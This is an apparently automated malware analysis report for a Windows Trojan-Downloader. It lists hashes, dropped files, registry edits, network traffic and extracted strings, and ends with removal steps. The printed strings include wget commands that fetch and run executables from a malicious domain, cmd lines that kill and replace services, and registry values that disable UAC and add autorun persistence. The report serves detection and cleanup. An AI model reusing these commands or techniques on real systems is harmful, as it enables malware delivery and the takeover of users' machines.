DeepScan.Generic.Malware.GSFTk.A8279D6C_c6a056ef14

by malwarelabrobot on June 2nd, 2017 in Malware Descriptions.

DeepScan:Generic.Malware.GSFTk.A8279D6C (BitDefender), HEUR:Trojan-Downloader.Win32.Generic (Kaspersky), DeepScan:Generic.Malware.GSFTk.A8279D6C (B) (Emsisoft), Artemis!C6A056EF14AF (McAfee), ML.Attribute.HighConfidence (Symantec), DeepScan:Generic.Malware.GSFTk.A8279D6C (FSecure), Win32/DH{QjUJSA?} (AVG), DeepScan:Generic.Malware.GSFTk.A8279D6C (AdAware), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, Malware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

MD5: c6a056ef14afd2cddb05854f1875ba4f
SHA1: 385fe29f795ec9f427ad385ecde9294375807395
SHA256: 1c9757d9fc83eaa47304d42aa8039d8fecd64c21c40ad886e942ab7c0c56b29e
SSDeep: 3072:/W8fZBONXcX1bUpWkI5njifd2VcPcxldxOrHU:/zZsyFbUpWX5njifkVcUxjG
Size: 102400 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2017-05-15 22:05:50
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan-Downloader. A Trojan program that downloads files from the Internet without the user's knowledge and executes them.

Payload

No specific payload has been found.

Process activity

The DeepScan creates the following process(es):

systemCheck.exe:1832
FuckTheWannaCry.exe:2124
%original file name%.exe:1976
kuxmbedujme.exe:3040
systemHome.exe:3056
systemHome.exe:2432
wget.exe:2524
wget.exe:2512
xdhgfg.exe:928

The DeepScan injects its code into the following process(es):

wget.exe:3540

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process systemCheck.exe:1832 makes changes in the file system.
The DeepScan creates and/or writes to the following file(s):

C:\Windows\sysiaop.exe (601 bytes)

The process %original file name%.exe:1976 makes changes in the file system.
The DeepScan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\FuckTheWannaCry.exe (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\systemHome.exe (155 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\wget.exe (73 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\systemCheck.exe (304 bytes)

The DeepScan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\res.txt (0 bytes)

The process systemHome.exe:3056 makes changes in the file system.
The DeepScan creates and/or writes to the following file(s):

C:\Windows\WindowsUpdate\kuxmbedujme.exe (32192 bytes)

The process systemHome.exe:2432 makes changes in the file system.
The DeepScan creates and/or writes to the following file(s):

C:\Windows\WindowsUpdate\xdhgfg.exe (33404 bytes)

The process wget.exe:2524 makes changes in the file system.
The DeepScan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\res.txt (1070 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\systemCheck.exe (21099 bytes)

The process wget.exe:3540 makes changes in the file system.
The DeepScan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\res.txt (13395 bytes)

The process wget.exe:2512 makes changes in the file system.
The DeepScan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\systemHome.exe (32746 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\res.txt (1068 bytes)

Registry activity

The process systemCheck.exe:1832 makes changes in the system registry.
The DeepScan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\services\Provides a common interface and Winmgemt]
"Description" = "Windows Management Instrumantation"

The process FuckTheWannaCry.exe:2124 makes changes in the system registry.
The DeepScan creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the DeepScan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"FuckTheWannaCry" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\FuckTheWannaCry.exe"

The process %original file name%.exe:1976 makes changes in the system registry.
The DeepScan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

The DeepScan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process kuxmbedujme.exe:3040 makes changes in the system registry.
The DeepScan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Security Center]
"UacDisableNotify" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"
"PromptOnSecureDesktop" = "0"

The process systemHome.exe:3056 makes changes in the system registry.
The DeepScan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Security Center]
"UacDisableNotify" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"
"PromptOnSecureDesktop" = "0"

To automatically run itself each time Windows is booted, the DeepScan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"kuxmbedujme.exe" = "C:\Windows\WindowsUpdate\kuxmbedujme.exe"

The process systemHome.exe:2432 makes changes in the system registry.
The DeepScan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Security Center]
"UacDisableNotify" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"
"PromptOnSecureDesktop" = "0"

To automatically run itself each time Windows is booted, the DeepScan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"xdhgfg.exe" = "C:\Windows\WindowsUpdate\xdhgfg.exe"

The process xdhgfg.exe:928 makes changes in the system registry.
The DeepScan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Security Center]
"UacDisableNotify" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"
"PromptOnSecureDesktop" = "0"

Dropped PE files

MD5 File path
1807f02c23b20966a66b15f38219c27e c:\Users\"%CurrentUserName%"\AppData\Local\Temp\FuckTheWannaCry.exe
294f36ce2f5bdb9762fbe02eff83dbc6 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\systemCheck.exe
641cd15c813d618175a71d657c96e87a c:\Users\"%CurrentUserName%"\AppData\Local\Temp\systemHome.exe
95ddf433184516596cf68477c2a374cb c:\Users\"%CurrentUserName%"\AppData\Local\Temp\wget.exe
0fa87626f3740e7b361ea91638fc96a5 c:\Windows\WindowsUpdate\kuxmbedujme.exe
29c49a150aeb2fb7b8554b4fdcad2303 c:\Windows\WindowsUpdate\xdhgfg.exe
294f36ce2f5bdb9762fbe02eff83dbc6 c:\Windows\sysiaop.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

VersionInfo

No information is available.

PE Sections

Name     Virtual Address   Virtual Size   Raw Size   Entropy   Section MD5
.text    4096              12624          12800      4.08685   6a380e60f3ddefe4b0092567be9dc538
.rdata   20480             1230           1536       2.92234   2fb0d7a0133b78bed52477ea5e80a314
.data    24576             124456         87040      5.34133   512870ede7f30107d9515203b0f1cf7d

URLs

URL IP
hxxp://do8fli.a1free9bird.com/systemHome.exe
hxxp://do8fli.a1free9bird.com/systemCheck.exe
hxxp://do8fli.a1free9bird.com:80/systemCheck.exe
hxxp://do8fli.a1free9bird.com:80/systemHome.exe
ka7ds.a1free9bird.com 119.1.109.84
dns.msftncsi.com 131.107.255.255
teredo.ipv6.microsoft.com 157.56.106.189


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP

Traffic

GET /systemCheck.exe HTTP/1.0
User-Agent: Wget/1.5.3.1
Host: do8fli.a1free9bird.com:80
Accept: */*


HTTP/1.1 200 OK
Date: Thu, 01 Jun 2017 19:12:57 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 18 May 2017 11:02:15 GMT
ETag: "19000-54fca5670e04b"
Accept-Ranges: bytes
Content-Length: 102400
Content-type: application/octet-stream
Content-Disposition: attachment
Connection: close

<<< skipped >>>

GET /systemHome.exe HTTP/1.0
User-Agent: Wget/1.5.3.1
Host: do8fli.a1free9bird.com:80
Accept: */*


HTTP/1.1 200 OK
Date: Thu, 01 Jun 2017 19:12:55 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 18 May 2017 11:02:08 GMT
ETag: "25568-54fca5600c66c"
Accept-Ranges: bytes
Content-Length: 152936
Content-type: application/octet-stream
Content-Disposition: attachment
Connection: close

<<< skipped >>>

The DeepScan connects to the servers at the following location(s):

%original file name%.exe_1976:

.text
`.rdata
@.data
GetProcessHeap
KERNEL32.dll
USER32.dll
MSVCRT.dll
GDI32.dll
GetWindowsDirectoryA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
ole32.dll
WINMM.dll
\wget.exe
!this is a Windows NT character-mode executable
.It!"*u
F%u!N
69.u7.AQ@
:I~.vj
@hx%x
6WX.dM
PTF.c
LOGIN/]0ks
@t%s7d
ILE.DI_CTzY
*execj
y-zH.aI2,CI
NE.FOR A
!"#'(),>`
)1.5.3.1$*
ADGOID(h.MMRLLPi
\.MBNADEG
TEDKMNSR4g.LF'[
KERNEL32.DLL
WSOCK32.dll
RegCloseKey
\FuckTheWannaCry.exe
MsgWaitForMultipleObjects
RegCreateKeyExA
cmd.exe /c sc stop mssecsvc2.0
cmd.exe /c net stop mssecsvc2.0
cmd.exe /c sc delete mssecsvc2.0
cmd.exe /c sc create mssecsvc2.0 binPath= "C:\FuckTheWannaCry.exe" start= AUTO
cmd.exe /c taskkill /f /im taskse.exe
cmd.exe /c taskkill /f /im taskdl.exe
cmd.exe /c taskkill /f /im @WanaDecryptor@.exe
cmd.exe /c taskkill /f /im mssecsvc.exe
cmd.exe /c taskkill /f /im tasksche.exe
software\microsoft\windows\CurrentVersion\Run\FuckTheWannaCry
kernel32.dll
program internal error number is %d.
:"%s"
:"%s".
hXXp://do9fli.a1free9bird.com/systemClearn.exe
hXXp://do6fli.a1free9bird.com/systemClearn.exe
hXXp://do8fli.a1free9bird.com/systemHome.exe
hXXp://do8fli.a1free9bird.com/systemCheck.exe
\systemHome.exe
\systemHome.exe -T 30 -t 60 -N
\res.txt
\wget.exe -o
cmd.exe /c
\res.txt
cmd.exe /c start
\systemCheck.exe
\systemCheck.exe -T 30 -t 60 -N
\systemClearn.exe
\systemClearn.exe -T 30 -t 60 -N
\systemClearn.ex -T 30 -t 60 -N

FuckTheWannaCry.exe_2124:

.text
`.rdata
@.data
GetProcessHeap
KERNEL32.dll
MsgWaitForMultipleObjects
USER32.dll
RegCloseKey
RegCreateKeyExA
ADVAPI32.dll
MSVCRT.dll
GDI32.dll
GetWindowsDirectoryA
SHELL32.dll
ole32.dll
cmd.exe /c sc stop mssecsvc2.0
cmd.exe /c net stop mssecsvc2.0
cmd.exe /c sc delete mssecsvc2.0
cmd.exe /c sc create mssecsvc2.0 binPath= "C:\FuckTheWannaCry.exe" start= AUTO
cmd.exe /c taskkill /f /im taskse.exe
cmd.exe /c taskkill /f /im taskdl.exe
cmd.exe /c taskkill /f /im @WanaDecryptor@.exe
cmd.exe /c taskkill /f /im mssecsvc.exe
cmd.exe /c taskkill /f /im tasksche.exe
\FuckTheWannaCry.exe
software\microsoft\windows\CurrentVersion\Run\FuckTheWannaCry
kernel32.dll
program internal error number is %d.
:"%s"
:"%s".

xdhgfg.exe_928:

.text
`.rdata
@.data
.rsrc
@.reloc
operator
GetProcessWindowStation
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
GET %s HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9b5) Gecko/2008032619 Firefox/3.0b5
Host: %s
,5-%d
Range:bytes=0-%s
POST /?%d HTTP/1.1
Content-Length: %d
X-%c: %c
hXXp://
VVV.%s
Windows 8
Windows 7
Windows Vista
Windows 2003
Windows XP
Windows 2000
Windows NT
Windows 2008
%d * %dMHz
dnsapi.dll
KERNEL32.dll
Software\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
.temp.fortest
\WindowsUpdate
F:\Projects\7
\20150606\Server\Release\Server.pdb
WS2_32.dll
IPHLPAPI.DLL
DNSAPI.dll
WinExec
GetProcessHeap
GetCPInfo
USER32.dll
RegOpenKeyA
RegCloseKey
ADVAPI32.dll
ShellExecuteExA
SHELL32.dll
SHLWAPI.dll
zcÁ
MFC42.DLL
MSVCRT.dll
_acmdln
ole32.dll
OLEAUT32.dll
function confirm(str){return true;}function alert(str){return true;}window.history.back(-1);
CWebBrowser2
jg5epm.a1free9bird.com
C:\Windows\WindowsUpdate\xdhgfg.exe
C:\Windows\WindowsUpdate
xdhgfg.exe
qlsozluufu.exe
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>
0 0$0(0,00040~0
;*;/;;;@;_;
2 2$2024282
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
kernel32.dll
USER32.DLL
{8856F961-340A-11D0-A96B-00C04FD705A2}
1, 0, 0, 1
BrowserServer.EXE

conhost.exe_3552:


wget.exe_3540:


wget.exe_3540_rwx_000B0000_00010000:

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\\wget.exe -o C:\Users\"%CurrentUserName%"\AppData\Local\Temp\\res.txt hXXp://do9fli.a1free9bird.com/systemClearn.exe -O C:\Users\"%CurrentUserName%"\AppData\Local\Temp\\systemClearn.exe -T 30 -t 60 -N
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\\res.txt
hXXp://do9fli.a1free9bird.com/systemClearn.exe
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\\systemClearn.exe
ComSpec=C:\Windows\system32\cmd.exe
OS=Windows_NT
Path=C:\Perl\site\bin;C:\Perl\bin;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;c:\Program Files\Wireshark
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
SystemRoot=C:\Windows
windir=C:\Windows
windows_tracing_flags=3
windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
Wget hXXp://do9fli.a1free9bird.com/systemClearn.exe
do9fli.a1free9bird.com
/systemClearn.exe
systemClearn.exe
172.104.65.83
hXXp://do9fli.a1free9bird.com:80/systemClearn.exe
rd.co
Connecting to do9fli.a1free9bird.com:80... :80/systemClearn.exe
(try:10) => `C:\Users\"%CurrentUserName%"\AppData\Local\Temp\\systemClearn.exe'
Wget hXXp://do9fli.a1free9bird.com:80/systemClearn.exe
1free9bird.com

wget.exe_3540_rwx_00401000_0002D000:


sysiaop.exe_764:

.text
`.rdata
@.data
.rsrc
_WSSh
^VSSh
SSSh`[@
SSShfd@
__MSVCRT_HEAP_SELECT
user32.dll
KERNEL32.dll
USER32.dll
RegOpenKeyExA
RegCloseKey
RegOpenKeyA
ADVAPI32.dll
WS2_32.dll
GetCPInfo
self.location=
GET %s%s HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
Host: %s
jdfwkey
GET %s HTTP/1.1
%s%s%s%s%s%s%s%s%s%s%s
%d.%d.%d.%d
192.168.1.10
222.222.222.222
192.168.1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/4.0;)
HTTP/1.1
ka7ds.a1free9bird.com
127.0.0.1:8080
del to access management information about operating syWindows Management Instrumantation
vice. If this service is stopped, most Windows-based software will not function properly. If
Iphlpapi.dll
winÊËÍ.exe
%dMbps
\rawip.ini
Win %s
%dGbps
zcÁ
C:\Windows\sysiaop.exe
Windows
winhlp32.exe
winhlp32.exe
Windows Winhlp32 Stub
5.2.3790.0 (srv03_rtm.030324-2048)
WINHLP32.EXE
Microsoft(R) Windows(R) Operating System
5.2.3790.0


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    systemCheck.exe:1832
    FuckTheWannaCry.exe:2124
    %original file name%.exe:1976
    kuxmbedujme.exe:3040
    systemHome.exe:3056
    systemHome.exe:2432
    wget.exe:2524
    wget.exe:2512
    xdhgfg.exe:928

  2. Delete the original DeepScan file.
  3. Delete or disinfect the following files created/modified by the DeepScan:

    C:\Windows\sysiaop.exe (601 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\FuckTheWannaCry.exe (23 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\systemHome.exe (155 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\wget.exe (73 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\systemCheck.exe (304 bytes)
    C:\Windows\WindowsUpdate\kuxmbedujme.exe (32192 bytes)
    C:\Windows\WindowsUpdate\xdhgfg.exe (33404 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\res.txt (1070 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "FuckTheWannaCry" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\FuckTheWannaCry.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "kuxmbedujme.exe" = "C:\Windows\WindowsUpdate\kuxmbedujme.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "xdhgfg.exe" = "C:\Windows\WindowsUpdate\xdhgfg.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
